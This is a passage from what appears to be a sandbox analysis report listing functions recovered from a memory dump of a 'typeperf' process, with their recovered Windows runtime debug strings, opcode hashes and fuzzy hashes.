                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: f2665b00109e6a830729884d32ac18e4856e015af93c10faac0d4a290a17a20d
                                                                                                                        • Instruction ID: 3a5c9edd4eaa5015538187ff63b87afce09cc2b336b28a8204c48aa40133313d
                                                                                                                        • Opcode Fuzzy Hash: f2665b00109e6a830729884d32ac18e4856e015af93c10faac0d4a290a17a20d
                                                                                                                        • Instruction Fuzzy Hash: D3E18C356087419FD725CF28C8C4B2ABBF4BB84724F180A5DF5A58B6E1D778D944CB42
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0333BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03377B7F
                                                                                                                        • RTL: Resource at %p, xrefs: 03377B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 03377BAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 3bb270f19e2b897d5b38de9f09fcb39a4a7ba7c1c4575b20627c6ba8881608fa
                                                                                                                        • Instruction ID: 12c2bbad9c065412e223df64cb29bb5b4da0b6cf76631cddc3c77e385eb5a694
                                                                                                                        • Opcode Fuzzy Hash: 3bb270f19e2b897d5b38de9f09fcb39a4a7ba7c1c4575b20627c6ba8881608fa
                                                                                                                        • Instruction Fuzzy Hash: 9E41E2357017029FD724DE29DC80B6AF7E9EF89720F044A1DF95ADB680DB30E4058B91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0333B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0337728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03377294
                                                                                                                        • RTL: Resource at %p, xrefs: 033772A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 033772C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: a94f4b3a16c7c1ef27e52caeb745e20965f2ea7c33a393cbff8dadd4dfce49d7
                                                                                                                        • Instruction ID: b765b7ccd5febe9ba0311a31c5631ebc199173a5bc72318ddc9ea529dcaa98cd
                                                                                                                        • Opcode Fuzzy Hash: a94f4b3a16c7c1ef27e52caeb745e20965f2ea7c33a393cbff8dadd4dfce49d7
                                                                                                                        • Instruction Fuzzy Hash: DA41DF35B00306ABDB20DE25CCC1F6AB7A9FF85710F144A19F965EB640DB25E8528BD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 033B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: ddbdaff9ab9197e7e31fd4a438dca01e351e0c88f77a02cbfe1505833d283f91
                                                                                                                        • Instruction ID: ad44e9248749a40c10dae986b7429cc28f02f6ee95ddc4130f94d678593e26f7
                                                                                                                        • Opcode Fuzzy Hash: ddbdaff9ab9197e7e31fd4a438dca01e351e0c88f77a02cbfe1505833d283f91
                                                                                                                        • Instruction Fuzzy Hash: 8F316476A102199FCB20DF29DC80BEFB7F8EB44610F444956E949E7640EB31AA458FB0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03347D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: 9baf4870ef4e6ffcffc0eea840714bbab3d955e725a6773d2d871a75cf4a89c8
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 0291A174E00316ABDB24DF69CCC0ABEB7E5EF45320F58461AE875AB2D0D734B9818750
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03309126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: a8f9d143a75056395a6a87cd15d9d3ae4ee763eab2b03ec4aa618b497269d520
                                                                                                                        • Instruction ID: 61afa8907333d978073b104903f32b010dace7251fc1dcad58f6baf29363e58f
                                                                                                                        • Opcode Fuzzy Hash: a8f9d143a75056395a6a87cd15d9d3ae4ee763eab2b03ec4aa618b497269d520
                                                                                                                        • Instruction Fuzzy Hash: C7815975D012699FDB35DB54CC94BEEB7B8AF08710F0581EAA909B7290D7709E84CFA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%